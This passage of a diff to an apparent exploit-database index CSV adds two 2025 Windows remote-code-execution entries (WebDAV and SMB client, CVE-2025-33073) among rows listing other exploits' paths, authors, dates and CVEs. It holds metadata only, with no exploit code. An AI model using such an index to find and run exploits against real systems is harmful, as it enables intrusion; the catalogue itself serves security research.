(Mahy)",remote,windows,21,2014-01-29,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z, 27277,exploits/windows/remote/27277.py,"PCMan FTP Server 2.07 - 'PASS' Remote Buffer Overflow",2013-08-02,Ottomatik,remote,windows,,2013-08-02,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,http://www.exploit-db.com/screenshots/idlt27500/screen-shot-2013-08-08-at-34942-pm.png,http://www.exploit-db.comPCMan.7z, @@ -45908,6 +45914,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 7521,exploits/windows/remote/7521.txt,"WebcamXP 5.3.2.375 - Remote File Disclosure",2008-12-19,nicx0,remote,windows,,2008-12-18,,1,OSVDB-50884;CVE-2008-5862,,,,, 51765,exploits/windows/remote/51765.txt,"WebCatalog 48.4 - Arbitrary Protocol Execution",2024-02-02,ItsSixtyN3in,remote,windows,,2024-02-02,2024-02-02,0,,,,,, 16550,exploits/windows/remote/16550.rb,"WebDAV - Application DLL Hijacker (Metasploit)",2010-09-24,Metasploit,remote,windows,,2010-09-24,2011-03-10,1,,"Metasploit Framework (MSF)",,,, +52334,exploits/windows/remote/52334.NA,"WebDAV Windows 10 - Remote Code Execution (RCE)",2025-06-15,"Dev Bui Hieu",remote,windows,,2025-06-15,2025-06-15,0,,,,,, 3913,exploits/windows/remote/3913.c,"webdesproxy 0.0.1 - GET Remote Buffer Overflow",2007-05-12,vade79,remote,windows,8080,2007-05-11,2016-09-29,1,OSVDB-40741;CVE-2007-2668,,,,http://www.exploit-db.comwebdesproxy-win32.tgz, 37165,exploits/windows/remote/37165.py,"WebDrive 12.2 (Build #4172) - Remote Buffer Overflow",2015-06-01,metacom,remote,windows,,2015-06-01,2016-03-08,1,,,,,, 45695,exploits/windows/remote/45695.rb,"WebExec - (Authenticated) User Code Execution (Metasploit)",2018-10-25,Metasploit,remote,windows,,2018-10-25,2019-03-17,1,CVE-2018-15442,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/2ab9a003d40e436e2f1099d0d164b76a0c2d4d33/modules/exploits/windows/smb/webexec.rb @@ -45957,6 +45964,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 41073,exploits/windows/remote/41073.py,"WinaXe Plus 8.7 - Remote Buffer Overflow",2017-01-16,"Peter Baris",remote,windows,,2017-01-16,2017-01-16,1,,,,http://www.exploit-db.com/screenshots/idlt41500/screen-shot-2017-01-16-at-152056.png,http://www.exploit-db.comwinaxep.exe, 16335,exploits/windows/remote/16335.rb,"WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,,2010-06-22,2011-03-06,1,CVE-2008-5159;OSVDB-42861,"Metasploit Framework (MSF)",,,, 51575,exploits/windows/remote/51575.txt,"Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution",2023-07-07,nu11secur1ty,remote,windows,,2023-07-07,2023-07-07,0,CVE-2022-21907,,,,, +52330,exploits/windows/remote/52330.py,"Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)",2025-06-15,"Mohammed Idrees Banyamer",remote,windows,,2025-06-15,2025-06-15,0,CVE-2025-33073,,,,, 52300,exploits/windows/remote/52300.py,"Windows 2024.15 - Unauthenticated Desktop Screenshot Capture",2025-05-25,"Chokri Hammedi",remote,windows,,2025-05-25,2025-05-25,0,CVE-n/a,,,,, 52325,exploits/windows/remote/52325.py,"Windows File Explorer Windows 10 Pro x64 - TAR Extraction",2025-06-13,"Daniel Miranda",remote,windows,,2025-06-13,2025-06-13,0,CVE-2025-24071,,,,, 52310,exploits/windows/remote/52310.py,"Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure",2025-05-29,"Mohammed Idrees Banyamer",remote,windows,,2025-05-29,2025-05-29,0,CVE-2025-24071,,,,,